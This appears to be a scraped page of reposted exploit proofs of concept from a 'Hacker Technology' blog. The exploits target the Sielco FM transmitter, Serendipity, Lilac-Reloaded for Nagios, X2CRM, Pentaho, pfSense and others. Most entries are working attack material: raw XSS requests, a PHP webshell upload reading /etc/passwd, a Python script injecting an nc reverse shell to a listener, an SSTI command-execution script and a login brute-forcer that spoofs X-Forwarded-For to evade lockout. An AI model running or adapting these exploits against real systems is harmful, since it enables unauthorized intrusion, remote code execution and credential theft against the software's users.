    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5766 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php 26.01.2023 -- $ curl -s http://RADIOFM/factory.ssi $ curl -s http://RADIOFM/rds.ssi $ curl -s http://RADIOFM/ip.ssi $ curl -s http://RADIOFM/alarm.ssi $ curl -s http://RADIOFM/i2s.ssi $ curl -s http://RADIOFM/time.ssi $ curl -s http://RADIOFM/fft.ssi $ curl -s http://RADIOFM/info.ssi $ curl -s http://RADIOFM/status.ssi $ curl -s http://RADIOFM/statusx.ssi $ curl -s http://RADIOFM/audio.ssi $ curl -s http://RADIOFM/smtp.ssi $ curl -s http://RADIOFM/rf.ssi $ curl -s http://RADIOFM/rfa.ssi $ curl -s http://RADIOFM/ping.ssi $ curl -s http://RADIOFM/lan.ssi $ curl -s http://RADIOFM/kappa.ssi $ curl -s http://RADIOFM/dbrt.ssi $ curl -s http://RADIOFM/audiom.ssi $ curl -s http://RADIOFM/log.ssi
  13. HireHackking

    Serendipity 2.4.0 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS) Author: Mirabbas Ağalarov Application: Serendipity Version: 2.4.0 Bugs: Stored XSS Technology: PHP Vendor URL: https://docs.s9y.org/ Software Link: https://docs.s9y.org/downloads.html Date of found: 13.04.2023 Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.Anyone who has the authority to create the new entry can do this payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E POST /serendipity/serendipity_admin.php? HTTP/1.1 Host: localhost Content-Length: 730 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b Connection: close serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1 2. visit the entry you created
  14. HireHackking

    Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated) Application: Serendipity Version: 2.4.0 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://docs.s9y.org/ Software Link: https://docs.s9y.org/downloads.html Date of found: 13.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== If we load the poc.phar file in the image field while creating a category, we can run commands on the system. <?php echo system("cat /etc/passwd"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it. Visit to http://localhost/serendipity/uploads/poc.phar poc request: POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1 Host: localhost Content-Length: 1561 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b Connection: close ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[token]" ae9b8ae35a756c24f9552a021ee81d56 ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[action]" admin ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[adminModule]" media ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[adminAction]" add ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar" Content-Type: application/octet-stream <?php echo system("cat /etc/passwd");?> ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_filename][1]" poc.phar ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_directory][1]" ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[column_count][1]" true ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[imageurl]" ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[imageimporttype]" image ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_filename][]" ------WebKitFormBoundaryZWKPiba66PSVGQzc Content-Disposition: form-data; name="serendipity[target_directory][]" ------WebKitFormBoundaryZWKPiba66PSVGQzc-- poc video : https://youtu.be/_VrrKOTywgo
  15. HireHackking

    Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python """ # Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 2023-04-13 # Exploit Author: max / Zoltan Padanyi # Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit # Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download # Version: 2.0.8 # Tested on: Debian 7.6 # CVE : N/A The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ; Use at your own risk! RCA - wild exec is ongoing without any filtering in library/Net/Traceroute.php 181 function _setTraceroutePath($sysname) 182 { 183 $status = ''; 184 $output = array(); 185 $traceroute_path = ''; 186 187 if ("windows" == $sysname) { 188 return "tracert"; 189 } else { 190 $traceroute_path = exec("which traceroute", $output, $status); [...] 257 function traceroute($host) 258 { 259 260 $argList = $this->_createArgList(); 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1]; 262 exec($cmd, $this->_result); """ import requests import argparse parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True) parser.add_argument("-i", "--ip", help="Listener IP", required=True) parser.add_argument("-p", "--port", help="Listener port", required=True, type=int) args = parser.parse_args() rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;" body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"} try: r = requests.get(args.url) if r.ok: print("[+] URL looks good...moving forward...") print("[+] Sending exploit in...") r = requests.post(args.url,data=body) if r.ok: print("[+] Got HTTP 200, check your listener!") else: print("[-] Some kind of error happened, check the http response below!") print(r.text) except Exception as e: print("General exception: " + str(e))
  16. HireHackking

    X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://x2crm.com/ # Software Link: https://sourceforge.net/projects/x2engine/ # Version: X2CRM v6.6/6.9 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: model # CVE: Use CVE-2022-48177 # Date: 27.12.2022 ''' POC REQUEST: ======== GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 EXPLOITATION ======== 1. Select Import Records Model in admin settings 2. Inject payload to the vulnerable parameter in GET request Payload: "><body onload="alert(4)"> '''
  17. HireHackking

    Title: Penetration testing with Armitage

    HireHackking posted a blog entry in Hacker Technology
    Armitage Armitage is a Java-based Metasploit graphical interface attack software. It can be used to combine exploits known in Metasploit to automate attacks against vulnerabilities existing in the host. Using Metasploit through the command line is more difficult and there are too many commands that need to be memorized. Armitage perfectly solves this problem. Users only need to simply click on the menu to achieve security testing and attacks on the target host. Armitage's good graphic display interface makes the attack process more intuitive and the user experience better. Due to its simplicity of operation, it is especially suitable for beginners of Metasploit to conduct security testing and attacks on target systems. Start After startup, it is shown in the figure! If the prompt is error, please enable postgresql in advance Scan the target For the scanning of the target, we can use Nmap or Msf to scan! As shown in the figure, we scanned some devices in the LAN There are windows devices, printers, and linux devices At this time, we can scan a device. You can see the port that is currently enabled by the device. Start the attack Right-click to select Scan, Armitage will call Metasploit's vulnerability scanning module, scan the target machine in a direction, find existing vulnerabilities, and provide a reference for the next step of determining the attack method: After success, we will find that the device icon will change Of course, we can also use various exps given by the system to attack!
  18. HireHackking

    File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control # Date: 2023-04-13 # Exploit Author: Andrea Intilangelo # Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com # Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe # Version: 7.5.0 # Tested on: Windows 10 Pro 22H2 x64 # CVE: CVE-2023-26918 Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application. C:\Program Files>icacls "c:\Program Files\FileReplicationPro" c:\Program Files\FileReplicationPro Everyone:(F) Everyone:(OI)(CI)(IO)(F) C:\Users\Administrator>sc qc frp [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: frp TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : FRPReplicationServer DIPENDENZE : Tcpip : Afd SERVICE_START_NAME : LocalSystem To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full access permissions. Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface.
  19. HireHackking

    X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Betul Denizler # Vendor Homepage: https://x2crm.com/ # Software Link: https://sourceforge.net/projects/x2engine/ # Version: X2CRM v6.6/6.9 # Tested on: Ubuntu Mate 20.04 # Vulnerable Parameter: Actions[subject] # CVE: CVE-2022-48178 # Date: 27.12.2022 ''' POC REQUEST: ======== POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 172 Origin: http://localhost Connection: close Referer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1 Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test EXPLOITATION ======== 1. Create an action 2. Inject payload to the vulnerable parameter in POST request Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E '''
  20. HireHackking

    ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) # Date: 2023-03-30 # CVE: CVE-2023-26692 # Exploit Author: Abdulaziz Saad (@b4zb0z) # Vendor Homepage: https://www.zcbs.nl # Version: 4.14k # Tested on: LAMP, Ubuntu # Google Dork: inurl:objecten.pl?ident=3D --- [#] Vulnerability : `$_GET['ident']` [#] Exploitation : `https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror= =3Dalert(%22XSS%22)%3E`
  21. HireHackking

    WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) Application: WebsiteBaker Version: 2.13.3 Bugs: Stored XSS Technology: PHP Vendor URL: https://websitebaker.org/pages/en/home.php Software Link: https://wiki.websitebaker.org/doku.php/en/downloads Date of found: 02.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.Anyone who has the authority to create the page can do this payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E POST /admin/pages/add.php HTTP/1.1 Host: localhost Content-Length: 137 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: null Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9 Connection: close b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add 2. Visit http://localhost/
  22. HireHackking

    ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2023-04-05 # Vendor : https://www.eset.com # Version : 16.0.26.0 # Tested on OS: Microsoft Windows 11 pro x64 #PoC : ============== C:\>sc qc ekrn [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ekrn TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe" LOAD_ORDER_GROUP : Base TAG : 0 DISPLAY_NAME : ESET Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  23. HireHackking

    Title: Qiniu Cloud Upload Tool developed based on JAVA

    HireHackking posted a blog entry in Hacker Technology
    Foreword Qiniu Cloud upload tool, developed using Java. User Demo About configuration Project download: java Qiniu Cloud
  24. HireHackking

    Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated) # Author: dwbzn # Date: 2022-04-04 # Vendor: https://www.hitachivantara.com/ # Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html # Version: Pentaho BA Server 9.3.0.0-428 # CVE: CVE-2022-43769, CVE-2022-43939 # Tested on: Windows 11 # Credits: https://research.aurainfosec.io/pentest/pentah0wnage # NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe). # Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage) import requests import argparse parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI') parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho') parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False) args = parser.parse_args() url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a" print ("running...") r = requests.get(url) if r.text == 'false': print ("command should've executed! nice.") else: print ("didn't work. sadge...")
  25. HireHackking

    pfsenseCE v2.6.0 - Anti-brute force protection bypass

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 ## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass ## Google Dork: intitle:"pfSense - Login" ## Date: 2023-04-07 ## Exploit Author: FabDotNET (Fabien MAISONNETTE) ## Vendor Homepage: https://www.pfsense.org/ ## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz ## Version: pfSenseCE <= 2.6.0 ## CVE: CVE-2023-27100 # Vulnerability ## CVE: CVE-2023-27100 ## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100 ## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc ## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66 import requests import sys import re import argparse import textwrap from urllib3.exceptions import InsecureRequestWarning # Expected Arguments parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : ./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt ./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt''')) parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)") parser.add_argument("-u", "--usersList", help="Username Dictionary") parser.add_argument("-p", "--passwdList", help="Password Dictionary") args = parser.parse_args() if len(sys.argv) < 2: print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") sys.exit(1) # Variable url = args.url usersList = args.usersList passwdList = args.passwdList # Suppress only the single warning from urllib3 needed. if url.upper().startswith("HTTPS://"): requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass') def login(userlogin, userpasswd): session = requests.session() r = session.get(url, verify=False) # Getting CSRF token value csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text) csrftoken = csrftoken.group(1) # Specifying Headers Value headerscontent = { 'User-Agent': 'Mozilla/5.0', 'Referer': f"{url}", 'X-Forwarded-For': '42.42.42.42' } # POST REQ data postreqcontent = { '__csrf_magic': f"{csrftoken}", 'usernamefld': f"{userlogin}", 'passwordfld': f"{userpasswd}", 'login': 'Sign+In' } # Sending POST REQ r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False) # Conditional loops if r.status_code != 200: print(f'[*] - Found Valid Credential !!') print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}") sys.exit(0) # Reading User.txt & Pass.txt files userfile = open(usersList).readlines() passfile = open(passwdList).readlines() for user in userfile: user = user.strip() for passwd in passfile: passwd = passwd.strip() login(user, passwd)